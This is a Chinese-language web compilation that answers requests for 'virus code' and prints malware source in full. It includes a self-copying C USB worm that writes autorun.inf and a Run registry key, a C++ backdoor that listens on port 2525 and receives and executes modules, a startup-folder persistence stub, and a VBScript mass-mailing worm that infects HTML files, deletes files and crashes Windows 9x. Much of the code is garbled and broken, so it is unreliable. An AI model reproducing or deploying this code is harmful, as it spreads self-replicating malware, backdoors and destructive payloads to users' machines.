c病毒代码大全(cc病毒)
本文目录一览:
- 1、求一个可以在机子上跑起来的C语言病毒代码
- 2、求C++病毒代码
- 3、比较简单的C++病毒代码
- 4、给个C语言病毒代码.....要复制的....越长越好
- 5、电脑病毒代码
- 6、用C语言编写的病毒代码
求一个可以在机子上跑起来的C语言病毒代码
C语言病毒代码 最基本的病毒.
本病毒的功能:
1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件
2.在C、D、E盘中生成自动运行文件
3.注册c:\windows\system\svchost.exe,使其开机自动运行
4.在C:\windows\system下生成隐蔽DLL文件
5.病毒在执行后具有相联复制能力本病毒类似普通U盘病毒雏形,具备自我复制、运行能力。以下程序在DEV-CPP 4.9.9.2(GCC编译器)下编译通过
请保存为SVCHOST.C编译,运行,本病毒对计算机无危害,请放心研究
/* SVCHOST.C */
/* SVCHOST.EXE */#define SVCHOST_NUM 6
#includestdio.h
#includestring.h
char *autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"};
char *files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"};
char *files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL",
"c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe",
"c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"};
char *regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f";int copy(char *infile,char *outfile)
{
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 ((input=fopen(infile,"rb"))!=NULL) ((output=fopen(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(temp,1,1,input);
fwrite(temp,1,1,output);
}
fclose(input);
fclose(output);
return 0;
}
else return 1;
}
int main(void)
{
FILE *input,*output;
int i,k;
for(i=0;i3;i++)
{
output=fopen(files_autorun[i],"w");
fprintf(output,"%s",autorun);
fclose(output);
}
for(i=0;i=SVCHOST_NUM;i++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input);
for(k=0;kSVCHOST_NUM;k++)
{
copy(files_svchost[i],files_svchost[k]);
}
i=SVCHOST_NUM+1;
}
}
system(regadd); /* 注册SVCHOST.exe,让其在启动时运行 */
return 0;
}在连载2中你将看到:
病毒对系统文件破坏的方法,病毒对文件的感染,病毒生成垃圾文件,病毒更具隐蔽性的方法。本版病毒所具有的功能:
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在explorer.exe前启动
4.修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
6.连锁能力,将病毒体相连,实现相连复制更新
7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程
8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下
10.附带删除文件函数(为防止危害,本函数默认不执行)本病毒到目前为止任何杀毒软件都无法将其查杀
本病毒单机默认使用对机器无害(破坏代码已屏蔽)
提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):@echo off
echo SK-CHINA SVCHOST KILLER 2007.6
echo WRITE BY S.K
taskkill /im mstsc32.exe /f
del c:\windows\wjview32.com
del c:\windows\explorer.exe
del c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\msmouse.dll
求C++病毒代码
/*
分布式病毒协议的C/C++描述代码
Coded by Vxk in CVC
CopyRight® 2001-2002
2002.10.18..night
*/
#include windows.h
#include winsock.h
#include stdio.h
#include stdlib.h
#include string.h
#include time.h
typedef struct CONNINST
{
SOCKET socket; /* 本地Socket号 */
unsigned short clientPort; /* 客户端端口 */
struct in_addr clientIP; /* 客户端IP地址 */
time_t beginTime; /* 连接建立时间 - 预留 */
time_t updateTime; /* 最后更新时间 - 预留 */
WORD lastestSequenceNumber; /* 最新包序号 */
unsigned short key; /* 密钥 - 预留*/
unsigned short cmdLen; /* 结果堆长度 */
char *pCmd; /* 命令堆 */
unsigned short resultLen; /* 结果堆长度 */
char *pResult; /* 结果堆 */
struct CONNINST* next; /* 下一个请求实例的地址 */
}CONNINST, *pCONNINST;
typedef struct Maillist
{
String Address;
String Name;
Struct Maillist *pNext;
}Maillist,*pMaillist;
typedef struct Moudlelist
{
String MoudleName;
String MoudleFileName;
String MoudleGuid;
String UseFor;
String MoudleAuther;
Struct Moudlelist *pNext;
}Moudlelist,*pMoudlelist;
typedef struct FileUpData
{
struct in_addr clientIP;
DWORD port;
DWORD SAMGuid;
String FileName;
lvoid cmd;
}FileUpData,*pFileUpData;
typedef struct DVPPak
{
String SAMCommand;
String Guid;
String Auther;
lvoid Cmd;
pMaillist *pMail;
pMoudlelist *pMoudle;
String Versionofme;
pmyPCinfo *pcinfo;
}DVPPak, *pDVPPak;
HINSTANCE hInst; /* 当前实例句柄 */
HWND hWndMain; /* 主窗口句柄 */
SOCKET listenSocket; /* 监听套接口 */
pCONNINST pConnInstHead;
pCONNINST addConnInst(SOCKET, unsigned short, struct in_addr);
pCONNINST getConnInst(SOCKET);
void OnWrite(SOCKET socket);
int netHalt(void);
void delConnInst(pCONNINST);
Void DvpExpCmd(Socket s);
void delAllConnInst(void);
void RecvFileThreadProc(pFileUpData *plm);
void SendFileThreadProc(pFileUpData *plm);
int uiStartup(HINSTANCE hInstance, int nCmdShow);
LRESULT CALLBACK MainWndProc(HWND,UINT,WPARAM,LPARAM);
int netStartup(void);
void OnAccept(SOCKET socket);
void OnClose(SOCKET socket);
void OnRead(SOCKET socket);
void sendResult(SOCKET socket);
int netStartup(void)
{
unsigned short wVersionRequested=MAKEWORD(1,1);
WSADATA wsaData;
SOCKADDR_IN saServer;
DWORD dwAddrStrLen;
char szAddress[128];
int nRet;
/* 初始化WinSock */
if(WSAStartup(wVersionRequested, wsaData)!=0)
{
//("Dvp 错误 :: 网络协议启动失败,请重新启动计算机.");
}
/* 检查Winsock版本 */
if(wsaData.wVersion != wVersionRequested)
{
//("Dvp 错误 :: 网络协议版本错误,请升级Winsock.");
}
/* 创建流式套接口 */
listenSocket=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(listenSocket==INVALID_SOCKET)
{
//("ERROR :: Can not create steam socket.");
return 0;
}
/* 通知套接口有请求事件发生 */
nRet=WSAAsyncSelect(listenSocket,
hWndMain, //在网络事件发生时需要接收消息的窗口句柄
UM_ASYNC, //在网络事件发生时要接收的消息
FD_ACCEPT | FD_READ | FD_WRITE | FD_CLOSE);
//只在程式开始执行一次,以后只要有套接口请求就发送消息
if (nRet==SOCKET_ERROR)
{
//("ERROR :: Can not initialize steam socket.");
closesocket(listenSocket);
return 0;
}
/* 地址结构设定 */
saServer.sin_port=htons(2525); //端口在这里哦
saServer.sin_family=AF_INET;
saServer.sin_addr.s_addr=INADDR_ANY;
/* 将一本地地址3872与套接口listenSocket捆绑 */
nRet=bind(listenSocket, (LPSOCKADDR)saServer, sizeof(struct sockaddr));
if (nRet==SOCKET_ERROR)
{
//("ERROR :: Can not bind socket to local port 1936.");
//("HINT :: Dvp Kernel Server can only run in one thread.");
closesocket(listenSocket);
return 0;
}
/* 让套接口开始监听 */
nRet = listen(listenSocket, SOMAXCONN);
if (nRet == SOCKET_ERROR)
{
//("ERROR :: Can not listen.");
closesocket(listenSocket);
return 0;
}
dwAddrStrLen = sizeof(szAddress);
GetLocalAddress(szAddress, dwAddrStrLen);
return 1;
}
/* Unknown how */
int GetLocalAddress(LPSTR lpStr, LPDWORD lpdwStrLen)
{
struct in_addr *pinAddr;
LPHOSTENT lpHostEnt;
int nRet;
int nLen;
// Get our local name
nRet = gethostname(lpStr, *lpdwStrLen);
if(nRet==SOCKET_ERROR)
{
lpStr[0]='\0';
return SOCKET_ERROR;
}
// "Lookup" the local name
lpHostEnt=gethostbyname(lpStr);
if(lpHostEnt==NULL)
{
lpStr[0] = '\0';
return SOCKET_ERROR;
}
// format first address in the list
pinAddr=((LPIN_ADDR)lpHostEnt-h_addr);
nLen=strlen(inet_ntoa(*pinAddr));
if((DWORD)nLen*lpdwStrLen)
{
*lpdwStrLen=nLen;
WSASetLastError(WSAEINVAL);
return SOCKET_ERROR;
}
*lpdwStrLen = nLen;
strcpy(lpStr, inet_ntoa(*pinAddr));
return 0;
}
int uiStartup(HINSTANCE hInstance, int nCmdShow)
{
WNDCLASS DvpWindow;
HANDLE hObject;
/* 创建实例 */
hInst=hInstance;
/* 判断是否已经运行 */
hObject=CreateMutex(NULL,FALSE,"DvpC");
if(GetLastError() == ERROR_ALREADY_EXISTS)
{
CloseHandle(hObject);
PostQuitMessage(0);
return 0;
}
/* 创建窗口 */
DvpWindow.style=0;//指定类的风格
DvpWindow.lpfnWndProc=(WNDPROC)MainWndProc;//窗口过程的远指针
DvpWindow.cbClsExtra=0;//窗口结构额外字节数
DvpWindow.cbWndExtra=0;//窗口实例额外字节数
DvpWindow.hInstance=hInstance;//窗口过程所在的实例
DvpWindow.hIcon=LoadIcon(hInstance,MAKEINTRESOURCE(MAIN));//调用标识类的图标
DvpWindow.hCursor=LoadCursor(NULL,IDC_ARROW);//调用标识类的光标
DvpWindow.hbrBackground=(HBRUSH)GetStockObject(WHITE_BRUSH);//标识背景类的画刷
DvpWindow.lpszMenuName=NULL;//指向标识类菜单资源的字符串,以空字符结束
DvpWindow.lpszClassName="DVPSample";//标识本类的名称
RegisterClass(DvpWindow);//注册窗口
hWndMain=CreateWindow("DVPSample",
"DVPSample",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,hInstance,NULL);
if(!hWndMain) return 0;
ShowWindow(hWndMain,SW_HIDE);//显示窗口
UpdateWindow(hWndMain);//更新窗口
return 1;
}
//处理窗口消息
LRESULT CALLBACK MainWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch(message)//开始处理消息
{
/* User Interface Message */
case WM_CLOSE:
return(DefWindowProc(hWnd,message,wParam,lParam));
break;
case WM_DESTROY:
deleteSystrayIcon();
PostQuitMessage(0);
break;
case WM_SIZE:
delAllConnInst();
break;
/* Network Message */
case UM_ASYNC:
switch(WSAGETSELECTEVENT(lParam))
{
case FD_ACCEPT:
OnAccept((SOCKET)wParam);
break;
case FD_READ:
OnRead((SOCKET)wParam);
break;
case FD_WRITE:
OnWrite((SOCKET)wParam);
break;
case FD_CLOSE:
OnClose((SOCKET)wParam);
break;
}
break;
default:
return(DefWindowProc(hWnd,message,wParam,lParam));//默认窗口过程的消息处理
}
return(0);
}
pCONNINST addConnInst(SOCKET socket, unsigned short port, struct in_addr ip)
{
/* 分配一块新的连接实例 */
pCONNINST newConnInst=(pCONNINST)malloc(sizeof(CONNINST));
/* 没有内存了 */
if(newConnInst==NULL) return NULL;
/* 分配一块新的SOCKADDR实例 */
// newConnInst-sockAddr=(LPSOCKADDR)malloc(nAddrLen);
// newConnInst-sockAddr=malloc(nAddrLen);
/* 没有内存了 */
// if(newConnInst-lpSockAddr==NULL)
// {
// free(newConnInst);
// return NULL;
// }
//装填新的请求包
newConnInst-socket=socket;
newConnInst-clientPort=port;
newConnInst-clientIP=ip;
newConnInst-pCmd=NULL;
newConnInst-pResult=NULL;
newConnInst-cmdLen=0;
newConnInst-resultLen=0;
newConnInst-beginTime=time(NULL);
newConnInst-updateTime=newConnInst-beginTime;
newConnInst-lastestSequenceNumber=0;
newConnInst-next=NULL;
//如果请求链表是空的
if(pConnInstHead==NULL)
{
//将这个请求作为链表头,放到pConnInstHead
pConnInstHead=newConnInst;
}
else
{
pCONNINST tempConn=pConnInstHead;
//走到链表尾
while(tempConn-next) tempConn=tempConn-next;
//追加新包到链表尾
tempConn-next=newConnInst;
}
//返回装填好的包的指针
return newConnInst;
}
pCONNINST getConnInst(SOCKET socket)
{
/* 遍历链表,寻找套接口 */
pCONNINST tempConn=pConnInstHead;
while(tempConn!=NULL)
{
if(tempConn-socket==socket) break;
tempConn=tempConn-next;
}
/*若没有,返回NULL */
return(tempConn);
}
void delConnInst(pCONNINST pConnInstToDel)
{
/* 如果要删除的是链表头 */
if(pConnInstToDel==pConnInstHead)
{
/* pConnInstHead-next 成为头 */
pConnInstHead=pConnInstHead-next;
/* 对链表头的free()在最后进行 */
}
else
{
pCONNINST tempConn=pConnInstHead;
/* 从链表头开始 到NULL为止 每次指向下一个*/
while(tempConn!=NULL)
{
/* 若当前的下一个是要被删除的 */
if (tempConn-next==pConnInstToDel)
{
/* 当前的下一个变成下一个的(要被删除的)下一个 */
tempConn-next=pConnInstToDel-next;
break;
}
}
}
/* 释放pConnInstToDel占用的内存 */
free(pConnInstToDel-pCmd);
free(pConnInstToDel-pResult);
free(pConnInstToDel);
return;
}
void delAllConnInst(void)
{
pCONNINST tempConn=pConnInstHead;
pCONNINST tempConn2;
/* 遍历链表,依次释放内存 */
/* 若存在tempConn则继续for */
while(tempConn!=NULL)
{
tempConn2=tempConn-next;
// free(tempConn-lpSockAddr);
// free(tempConn-pResultBuf);
free(tempConn-pCmd);
free(tempConn-pResult);
free(tempConn);
tempConn=tempConn2;
}
pConnInstHead=NULL;
return;
}
void OnAccept(SOCKET socket)
{
SOCKADDR_IN sockAddrIn;
pCONNINST connInst=NULL;
SOCKET peerSocket;
int tempLength;
// accept the new socket descriptor
tempLength=sizeof(SOCKADDR_IN);
peerSocket=accept(listenSocket, (struct sockaddr FAR *)sockAddrIn, (int FAR*)tempLength);
if(peerSocket==SOCKET_ERROR)
{
if(WSAGetLastError()!=WSAEWOULDBLOCK)
{
//("Error! Accept error. The request form %s can't be accepted.",inet_ntoa(sockAddrIn.sin_addr));
return;
}
}
//让它也可以在读写或关闭的时候向窗口发送消息
WSAAsyncSelect(peerSocket, hWndMain, UM_ASYNC, FD_READ | FD_WRITE | FD_CLOSE);
if(peerSocket==SOCKET_ERROR)
{
//("Error! WSAAsyncSelect error. The request form %s can't be accepted.",inet_ntoa(sockAddrIn.sin_addr));
return;
}
//将这已连接的套接口放到链表里
connInst=addConnInst(peerSocket, sockAddrIn.sin_port, sockAddrIn.sin_addr);
if (connInst==NULL)
{
//内存满了
//("Error! Memory is full! The request form %s can not be accepted",inet_ntoa(sockAddrIn.sin_addr));
closesocket(peerSocket);
return;
}
//("A new request from: %s is accepted on socket %d.",
inet_ntoa(sockAddrIn.sin_addr), peerSocket);
return;
}
void OnClose(SOCKET socket)
{
pCONNINST connInst;
// 检查是否已经删除了这个套接口
connInst=getConnInst(socket);
if (connInst==NULL) return;
// It is still in stock list
// The client must have to reset the connection.
// Clean up.
//("The request from %s has been closed. Local socket: %d is free now.", inet_ntoa(connInst-clientIP), connInst-socket);
closesocket(connInst-socket);
delConnInst(connInst);
}
/* 可以读取数据了 */
void OnRead(SOCKET socket)
{
pCONNINST connInst;
int bytesReceive;
char* pNewCmd=NULL;
/* 查找对应的连接实例 */
connInst=getConnInst(socket);
/* 如果找不到连接实例, 读光缓冲区, 然后ByeBye */
if(connInst==NULL)
{
char buf[1024];
while(recv(socket, buf, sizeof(buf)-1, 0)!=SOCKET_ERROR);
closesocket(socket);
//("When ready to receive (OnREAD), get some noise - DEBUG");
//("it is %c%c%c",buf[0],buf[1],buf[2]);
return;
}
/* 否则将所有数据读入命令堆 */
if(connInst-pCmd==NULL)
{
connInst-pCmd=(char*)malloc(64);
connInst-cmdLen=0;
if(connInst-pCmd==NULL)
{
//("Before receiving data from %s, local memory overflowed.", inet_ntoa(connInst-clientIP));
closesocket(connInst-socket);
delConnInst(connInst);
return;
}
}
pNewCmd=(char*)malloc(64);
if(pNewCmd==NULL)
{
//("Before receiving data from %s, local memory overflowed.", inet_ntoa(connInst-clientIP));
closesocket(connInst-socket);
delConnInst(connInst);
return;
}
memset(pNewCmd, 0, 64);
bytesReceive=recv(socket, pNewCmd, 64, 0);
//("收到:%d字节",bytesReceive);
if(bytesReceive==SOCKET_ERROR)
{
//操作此时由于Windows Sockets实现的资源或其它限制的制约而无法调度
if(WSAGetLastError()==WSAEWOULDBLOCK) return;
//("recv() Error");
//("Closing socket: %d", connInst-socket);
closesocket(connInst-socket);
delConnInst(connInst);
return;
}
/* 有的时候, OnRead消息是假的, 收到的字节数是-1, 要忽略这种情况*/
if(bytesReceive0)
{
connInst-pCmd=(char*)realloc(connInst-pCmd, connInst-cmdLen+bytesReceive);
memcpy(connInst-pCmd[connInst-cmdLen], pNewCmd, bytesReceive);
connInst-cmdLen+=bytesReceive;
free(pNewCmd);
DvpExpCmd(socket);
}
else
{
free(pNewCmd);
}
return;
}
Void DvpExpCmd(Socket s)
{
pCONNINST connInst=getConnInst(s);
char *pThisCmd=NULL; /* 从命令堆里面读取第一个命令包, 这个用来保存命令包的地址 */
char *pSwap=NULL; /* 清除命令堆旧命令交换用的指针 */
if(pThisCmd==NULL)
{
//("DEBUG - 无法定义命令包起点, 函数返回, 等待命令.");
return;
}
if(pThisCmd connInst-pCmd)
{
/*
如果前面有残余数据, 那么就立刻清除残余数据
这种情况遇到的不会多
*/
//("处理残余数据");
pSwap=connInst-pCmd;
connInst-pCmd=strdup(pThisCmd);
connInst-cmdLen-=(pThisCmd-connInst-pCmd);
free(pSwap);
/* 继续 */
}
LVoid pak;
while (*pThisCmd!=Null)
{
pak+=*pThisCmd;
pThisCmd+=sizeof(char);
}
pDVPPak *myDvp=*(DVPPak*)pak;
if(myDvp-SAMCommand=='UPData')
{/*对方传文件给我们!!*/
pFileUpData *Up=*(FileUpData*)myDvp-cmd;
DWORD dwThread;
if(*up!=Null){up-clientIP=pThisCmd-clientIP;
if(CreateThread(NULL,0,RecvFileThreadProc, *up, 0, dwThread)==NULL)//文件接受线程
{//something wrong with Recv... }else
{ if(CheckSam(myDvp-Guid,myDvp-Auther)!='No')//处理权限,自己发挥吧。。。
{ int (__stdcall*) MoudleStart=(void*)GetProcAddress(LoadLibrary(UP-FileName),"MoudleStartMe" );
MoudleStart(Up-Cmd);//开始执行!
}}
}
free(up);
}
if(myDvp-SAMCommand=='GetData')
{/*2002.10.19*/
/*对方要我们的文件*/
pFileUpData *Up=*(FileUpData*)myDvp-cmd;
if(up!=Null){up-clientIP=pThisCmd-clientIP;
DWORD dwThread;
if(CreateThread(NULL,0,SendFileThreadProc, *up, 0, dwThread)==NULL)//文件传送线程
{//something wrong with Recv... }
else{/*传输SamCmmand='UpData',cmd=(lvoid*)up给对方*/}}
free(up);
}
if(myDvp-SAMCommand==Null)
{
/*处理对方发来信息中有用的信息*/
/*对于我们来讲,这个问题是应该由个人处理的*/
/*对于这里我们还要给对方返回一包即我们的信息*/
/*此处需要发送消息到对方,来获得如文件之类的东西*/
}
free(pThisCmd);
free(myDvp);
return -1;
}
void OnWrite(SOCKET socket)
{
pCONNINST connInst;
connInst=getConnInst(socket);
/* 如果找不到连接实例, 读光缓冲区, 然后ByeBye */
if(connInst==NULL)
{
char buf[1024];
while(recv(socket, buf, sizeof(buf)-1, 0)!=SOCKET_ERROR);
closesocket(socket);
//("When ready to send, get some noise");
//("it is %c%c%c",buf[0],buf[1],buf[2]);
return;
}
/* 如果连接实例有需要发送的数据 */
if(connInst-pResult!=NULL)
{
sendResult(socket);
}
return;
}
void sendResult(SOCKET socket)
{
pCONNINST connInst=getConnInst(socket);
int bytesSent;
bytesSent=send(connInst-socket, connInst-pResult, connInst-resultLen, 0);
if(bytesSent==SOCKET_ERROR)
{
if (WSAGetLastError()!=WSAEWOULDBLOCK)
{
//("send() Error");
//("Closing socket: %d", connInst-socket);
closesocket(connInst-socket);
delConnInst(connInst);
return;
}
}
if((unsigned int)bytesSentconnInst-resultLen)//如果发送的字节少于结果字节
{
char* temp;
connInst-resultLen=connInst-resultLen-bytesSent;
temp=(char*)malloc(connInst-resultLen);
memcpy(temp,connInst-pResult+bytesSent,connInst-resultLen);
free(connInst-pResult);
connInst-pResult=temp;
}
else //如果全部发送完毕
{
free(connInst-pResult);
connInst-resultLen=0;
connInst-pResult=NULL;
}
}
int netHalt(void)
{
pCONNINST connTemp;
/* 关闭监听套接口 */
closesocket(listenSocket);
/* 关闭所有正在连接的套接口 */
connTemp=pConnInstHead;
while(connTemp)
{
closesocket(connTemp-socket);
connTemp=connTemp-next;
}
/* 清除请求包链表 */
delAllConnInst();
Beep(200,50);
WSACleanup();
return 1;
}
int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
MSG msg;
/* User Interface Startup */
uiStartup(hInstance, nCmdShow);
/* Network Startup */
netStartup();
/*我们在下面应该做些什么?搜索ip连接。。。。。*/
/* 进入消息循环 */
while(GetMessage(msg,NULL,0,0))
{
TranslateMessage(msg);
DispatchMessage(msg);
}
/* Network Halt*/
netHalt();
return 0;
}
void RecvFileThreadProc(pFileUpData *plm)
{
// Open target file
// Get remote address
int i,nPort;
char svAddress[256];
lstrcpyn(svAddress,plm-clientIP-sin_addr-s_addr,256);
for(i=0;i256;i++) {
if(svAddress==':') {
svAddress='\0';
nPort=atoi(svAddress[i+1]);
break;
}
}
// Put into SOCKADDR_IN structure
SOCKADDR_IN saddr;
struct hostent *he;
DWORD dwIPAddr;
dwIPAddr=inet_addr(svAddress);
if(dwIPAddr==INADDR_NONE) {
he=gethostbyname(svAddress);
if(gethostbyname==NULL) {
free(plm);
return 1;
}
dwIPAddr=*(DWORD *)he-h_addr_list[0];
}
memset(saddr,0,sizeof(SOCKADDR_IN));
saddr.sin_family=AF_INET;
saddr.sin_port=htons(plm-port);
saddr.sin_addr.s_addr=dwIPAddr;
// Create socket
SOCKET sv;
sv=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(s==INVALID_SOCKET) {
free(plm);
return 1;
}
// Connect to remote port
if(connect(sv,(SOCKADDR *)saddr,sizeof(SOCKADDR_IN))==SOCKET_ERROR) {
closesocket(sv);
free(plm);
return 1;
}
// Nonblocking mode
DWORD dwBlock=1;
ioctlsocket(sv, FIONBIO, dwBlock);
HANDLE hFile;
hFile=CreateFile(plm-FileName,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile!=NULL) {
int nBytes;
DWORD dwCount;
char svBuffer[1024];
do {
// Give up time
Sleep(20);
nBytes=recv(sv,svBuffer,1024,0);
if(nBytes0) {
WriteFile(hFile,svBuffer,nBytes,dwCount,NULL);
}
} while(nBytes0);
CloseHandle(hFile);
}
closesocket(sv);
return 0;
}
void SendFileThreadProc(pFileUpData *plm)
{
SOCKET sv;
sv=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(sv==INVALID_SOCKET) {
free(plm);
return -2;
}
// Bind to desired port
SOCKADDR_IN saddr;
memset(saddr,0,sizeof(SOCKADDR_IN));
saddr.sin_family=AF_INET;
saddr.sin_port=htons(plm-port);
saddr.sin_addr.s_addr=0;
if(bind(sv,(SOCKADDR *)saddr,sizeof(SOCKADDR_IN))==SOCKET_ERROR) {
closesocket(s);
free(pptp);
free(ppi);
return -1;
}
listen(sv,MAX_CONNECTIONS);
// Nonblocking mode
DWORD argp=TRUE;
ioctlsocket(sv,FIONBIO,argp);
sleep(1000);
SOCKET psv;
int tempLength;
// accept the new socket descriptor
tempLength=sizeof(SOCKADDR_IN);
psv=accept(sv, (struct sockaddr FAR *)sockAddrIn, (int FAR*)tempLength);
if(peerSocket==SOCKET_ERROR)
{
if(WSAGetLastError()!=WSAEWOULDBLOCK)
{
//("Error! Accept error. The request form %s can't be accepted.",inet_ntoa(sockAddrIn.sin_addr));
return;
}
}
HANDLE hInFile;
hInFile=CreateFile(plm-FileName,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,NULL);
if(hInFile==INVALID_HANDLE_value) {
//Couldn't open local file.
return -1;
}
char svBuffer[1024];
DWORD dwBytes;
do {
ReadFile(hInFile,svBuffer,1024,dwBytes,NULL);
if(send(psv,svBuffer,dwBytes,0)=0) break;
} while(dwBytes==1024);
closesocket(psv);
closesocket(sv);
CloseHandle(hInFile);
Return -1;
}
比较简单的C++病毒代码
最简单的病毒代码如下: #include "windows.h"
#include "stdio.h"
void main(int argc,char * argv[])
{
//printf("%s\n",argv[i]);
char copy[80];
sprintf(copy,"copy %s \"%%userprofile%%\\「开始」菜单\\程序\\启动\"",argv[0]);
system(copy); //将这个程序拷到开机启动文件夹下面
//char cmd[]="shutdown -r -t 0";//自动重起
char cmd[]="ping baidu.com";//将这个换成上面的,就是一开机就重起了!
system(cmd);
system("pause");
}
给个C语言病毒代码.....要复制的....越长越好
下面就对“陷阱”的发作过程和源代码作详细的揭密。
病毒具有自身加密能力(使用 JavaScript 编码技术),使得普通用户无法看到病毒原码,但在被感染 VBS 文件中并没有加密,于是作为一个入口点,我非常轻松地得到所有源码。
'@ thank you! make use of other person to get rid of an enemy, trap _2001
'这句话的意思可能是“借刀杀人”,然后是病毒名称“陷阱”
on error resume next
dim vbscr, fso,w1,w2,MSWKEY,HCUW,Code_Str, Vbs_Str, Js_Str
dim defpath, smailc, MAX_SIZE
dim whb(), title(10)
smailc = 4
Redim whb(smailc) ’白宫相关人员邮件名单
whb(0) = "president@whitehouse.gov"
whb(1) = "vice.president@whitehouse.gov "
whb(2) = "first.lady@whitehouse.gov"
whb(3) = "mrs.cheney@whitehouse.gov"
'发送邮件的主题
title(0) = "Thanks for helping me!"
title(1) = "The police are investigating the robbery"
title(2) = "an application for a job "
title(3) = "The aspects of an application process pertinent to OSI"
title(4) = "What a pleasant weather. Why not go out for a walk?"
title(5) = "These countries have gone / been through too many wars"
title(6) = "We've fixed on the 17th of April for the wedding"
title(7) = "The wind failed and the sea returned to calmness."
title(8) = "the sitting is open!"
title(9) = ""
defpath = "C:\Readme.html" ' 病毒文件
MAX_SIZE = 100000 ' 定义传染文件的最大尺寸
MSWKEY = "HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\"
HCUW = "HKEY_CURRENT_USER\Software\Microsoft\WAB\"
main
sub main() '主程序
on error resume next
dim w_s
w_s= WScript.ScriptFullName '得到病毒文件本身的路径
if w_s = "" then
Err.Clear
set fso = CreateObject("Scripting.FileSystemObject") '创建文件系统对象
if getErr then '辨认病毒状态
Randomize '初始化随机种子
ra = int(rnd() * 7) '产生随机数
doucment.write title(ra) ' 写随机内容
ExecuteMail '执行邮件状态时的程序
else
ExecutePage '执行 WEB 页状态时的程序
end if
else
ExecuteVbs '执行 VBS 文件状态时的程序
end if
end sub
Function getErr() 忽略错误
if Err.number0 then
getErr=true
Err.Clear
else
getErr=false
end if
end function
sub ExecutePage() 'WEB 页状态时的程序
on error resume next
dim Html_Str, adi, wdf, wdf2,wdf3,wdsf, wdsf2, vf
Vbs_Str = GetScriptCode("vbscript") '得到 VBScript 代码
Js_Str = GetJavaScript() ' 得到 Javascript 代码
Code_Str = MakeScript(encrypt(Vbs_str),true) '得到已加密过的脚本代码
Html_Str = MakeHtml(encrypt(Vbs_str), true) '得到已加密的完整HTML代码
Gf
'定义病毒文件的路径
wdsf = w2 "Mdm.vbs"
wdsf2 = w1 "Profile.vbs"
wdf = w2 "user.dll" ' 注意 wdf 和 wdf3 两个文件非常迷惑人
wdf2 = w2 "Readme.html"
wdf3 = w2 "system.dll"
'创建病毒文件
set vf = fso.OpenTextFile (wdf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf, 2, true)
vf.write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdsf2, 2, true)
vf.Write Vbs_Str
vf.close
set vf = fso.OpenTextFile (wdf2, 2, true)
vf.write Html_Str
vf.close
set vf = fso.OpenTextFile (wdf3, 2, true)
vf.write Code_Str
vf.close
修改注册表,让病毒文件在每一次计算机启动自动执行
Writereg MSWKEY "CurrentVersion\Run\Mdm", wdsf, ""
Writereg MSWKEY "CurrentVersion\RunServices\Profile", wdsf2, ""
SendMail ' 执行发送邮件程序
Hackpage ' 执行感染网站程序
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then '遍历所有本地硬盘和网络共享硬盘
call SearchHTML(x "\") '执行文件感染程序
end if
next
if TestUser then '检查用户
Killhe 执行删除文件操作
else
if Month(Date) Day(Date) = "75" then '如系统时间为 7月5日
set vf = fso.OpenTextFile(w2 "75.htm", 2,true) ’创建系统攻击文件
vf.write MakeScript ("window.navigate ('c:/con/con');", false)
vf.close
Writereg MSWKEY "CurrentVersion\Run\75", w2 "75.htm", "" '自动启动
window.navigate "c:/con/con" '立刻蓝屏,利用 Windows BUG,能引起 Win9X 系统100%死机(即无法恢复的蓝屏)
else '如不是7.5
if fso.FileExists(w2 "75.htm") then fso.DeleteFile w2 "75.htm" ' 删除75.htm
end if
end if
if fso.FileExists(defpath) then fso.DeleteFile defpath ' 删除 C:\Readme.html 病毒文件
end sub
sub ExecuteMail() '邮件状态时执行的程序
on error resume next
Vbs_Str = GetScriptCode("vbscript")
Js_Str = GetJavaScript()
